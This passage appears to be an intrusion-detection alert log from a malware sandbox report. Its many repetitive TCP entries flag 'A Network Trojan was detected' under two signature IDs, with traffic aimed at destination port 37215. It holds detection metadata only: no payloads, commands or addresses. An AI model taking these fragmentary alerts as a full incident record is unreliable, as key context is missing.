                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458641
                SID:2835222
                Source Port:34420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965900
                SID:2829579
                Source Port:47838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161197
                SID:2829579
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895994
                SID:2829579
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035374
                SID:2835222
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576502
                SID:2829579
                Source Port:48564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042060
                SID:2835222
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265018
                SID:2829579
                Source Port:41886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517975
                SID:2835222
                Source Port:36446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900582
                SID:2835222
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322248
                SID:2829579
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713638
                SID:2829579
                Source Port:50466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2829579
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443152
                SID:2835222
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914915
                SID:2829579
                Source Port:59616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110862
                SID:2829579
                Source Port:48378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801195
                SID:2829579
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266370
                SID:2835222
                Source Port:35950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994018
                SID:2835222
                Source Port:34032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022413
                SID:2829579
                Source Port:44650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.999152
                SID:2829579
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766900
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558591
                SID:2829579
                Source Port:34134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429200
                SID:2829579
                Source Port:55284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613827
                SID:2829579
                Source Port:53666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559937
                SID:2835222
                Source Port:60774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533751
                SID:2835222
                Source Port:59420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966282
                SID:2835222
                Source Port:55402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467106
                SID:2835222
                Source Port:37686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555183
                SID:2829579
                Source Port:36936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971995
                SID:2829579
                Source Port:33486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928164
                SID:2835222
                Source Port:48816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665232
                SID:2829579
                Source Port:39162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899176
                SID:2835222
                Source Port:36662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643315
                SID:2829579
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215529
                SID:2835222
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984739
                SID:2829579
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062585
                SID:2835222
                Source Port:57850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944742
                SID:2835222
                Source Port:33480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968299
                SID:2835222
                Source Port:33516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843522
                SID:2835222
                Source Port:60522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891294
                SID:2835222
                Source Port:33912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445378
                SID:2835222
                Source Port:35056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571611
                SID:2829579
                Source Port:56262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515261
                SID:2829579
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588712
                SID:2829579
                Source Port:56492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813400
                SID:2835222
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473476
                SID:2835222
                Source Port:47102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555951
                SID:2829579
                Source Port:48662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134655
                SID:2835222
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947706
                SID:2829579
                Source Port:40722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798353
                SID:2829579
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448988
                SID:2829579
                Source Port:51444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100121
                SID:2829579
                Source Port:53570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420890
                SID:2829579
                Source Port:59356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784721
                SID:2829579
                Source Port:40212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040020
                SID:2835222
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617609
                SID:2829579
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940065
                SID:2835222
                Source Port:57230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809998
                SID:2835222
                Source Port:59712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871833
                SID:2835222
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617336
                SID:2829579
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713521
                SID:2829579
                Source Port:59536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968372
                SID:2835222
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074765
                SID:2829579
                Source Port:60258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841783
                SID:2835222
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289066
                SID:2829579
                Source Port:56080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607573
                SID:2835222
                Source Port:43610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263985
                SID:2829579
                Source Port:58254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584055
                SID:2835222
                Source Port:50654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262671
                SID:2829579
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890928
                SID:2829579
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796757
                SID:2835222
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139952
                SID:2835222
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338515
                SID:2829579
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509322
                SID:2835222
                Source Port:42050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516068
                SID:2829579
                Source Port:34888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499833
                SID:2829579
                Source Port:37096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.862691
                SID:2835222
                Source Port:41094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840404
                SID:2829579
                Source Port:43342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521145
                SID:2829579
                Source Port:34768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961863
                SID:2829579
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659514
                SID:2829579
                Source Port:54772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521789
                SID:2835222
                Source Port:40678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618670
                SID:2835222
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231021
                SID:2835222
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043894
                SID:2835222
                Source Port:56820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209665
                SID:2835222
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263685
                SID:2829579
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783858
                SID:2835222
                Source Port:34606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765779
                SID:2829579
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154892
                SID:2835222
                Source Port:53198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521679
                SID:2835222
                Source Port:48828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614795
                SID:2835222
                Source Port:50378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013508
                SID:2835222
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225404
                SID:2829579
                Source Port:38574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154267
                SID:2835222
                Source Port:39908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733402
                SID:2829579
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564750
                SID:2835222
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767630
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044578
                SID:2829579
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870163
                SID:2829579
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714115
                SID:2835222
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805983
                SID:2835222
                Source Port:35562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843585
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184451
                SID:2829579
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432619
                SID:2829579
                Source Port:34704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505113
                SID:2835222
                Source Port:38884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910362
                SID:2835222
                Source Port:60112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015010
                SID:2829579
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465870
                SID:2835222
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814450
                SID:2835222
                Source Port:36990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520126
                SID:2829579
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287116
                SID:2829579
                Source Port:50182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526870
                SID:2835222
                Source Port:46908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964743
                SID:2829579
                Source Port:60956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224642
                SID:2829579
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2829579
                Source Port:33430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900331
                SID:2835222
                Source Port:35312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942845
                SID:2835222
                Source Port:57834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946763
                SID:2835222
                Source Port:57498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552065
                SID:2829579
                Source Port:56600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226850
                SID:2835222
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337279
                SID:2829579
                Source Port:33920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882914
                SID:2829579
                Source Port:48528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685169
                SID:2829579
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842285
                SID:2829579
                Source Port:39946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739803
                SID:2829579
                Source Port:52066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615289
                SID:2835222
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435041
                SID:2835222
                Source Port:33602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644738
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629053
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324691
                SID:2835222
                Source Port:54602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654050
                SID:2829579
                Source Port:57164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264165
                SID:2829579
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440533
                SID:2829579
                Source Port:41368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223872
                SID:2835222
                Source Port:33856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927840
                SID:2835222
                Source Port:60462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501824
                SID:2835222
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.973807
                SID:2829579
                Source Port:53388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915686
                SID:2835222
                Source Port:60878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800961
                SID:2829579
                Source Port:53092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330543
                SID:2829579
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721755
                SID:2835222
                Source Port:48436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639640
                SID:2829579
                Source Port:39366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784318
                SID:2829579
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181833
                SID:2835222
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975155
                SID:2829579
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926395
                SID:2829579
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896072
                SID:2829579
                Source Port:52280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133656
                SID:2829579
                Source Port:55338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263135
                SID:2829579
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586998
                SID:2829579
                Source Port:51696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.772313
                SID:2835222
                Source Port:42998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736905
                SID:2835222
                Source Port:44088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330576
                SID:2829579
                Source Port:49922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575909
                SID:2829579
                Source Port:53194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520431
                SID:2835222
                Source Port:45804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837367
                SID:2829579
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614001
                SID:2835222
                Source Port:49214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973277
                SID:2829579
                Source Port:39270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184780
                SID:2835222
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417672
                SID:2835222
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283791
                SID:2829579
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683972
                SID:2835222
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292234
                SID:2835222
                Source Port:42770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929767
                SID:2835222
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782958
                SID:2835222
                Source Port:45762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946190
                SID:2829579
                Source Port:47942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363206
                SID:2835222
                Source Port:46460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009396
                SID:2829579
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824612
                SID:2835222
                Source Port:50752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161222
                SID:2829579
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431255
                SID:2829579
                Source Port:41668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227680
                SID:2829579
                Source Port:39212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967497
                SID:2829579
                Source Port:33718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317215
                SID:2835222
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427499
                SID:2835222
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858033
                SID:2835222
                Source Port:50486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374535
                SID:2829579
                Source Port:57506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283842
                SID:2835222
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558203
                SID:2829579
                Source Port:35354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.267896
                SID:2835222
                Source Port:34450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628583
                SID:2835222
                Source Port:57964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694214
                SID:2829579
                Source Port:42494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361613
                SID:2829579
                Source Port:58032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264490
                SID:2829579
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989172
                SID:2829579
                Source Port:59008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278184
                SID:2829579
                Source Port:60516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870342
                SID:2835222
                Source Port:39894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417814
                SID:2835222
                Source Port:51912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982977
                SID:2829579
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891217
                SID:2829579
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262666
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989054
                SID:2835222
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155670
                SID:2829579
                Source Port:52376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459396
                SID:2829579
                Source Port:45300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
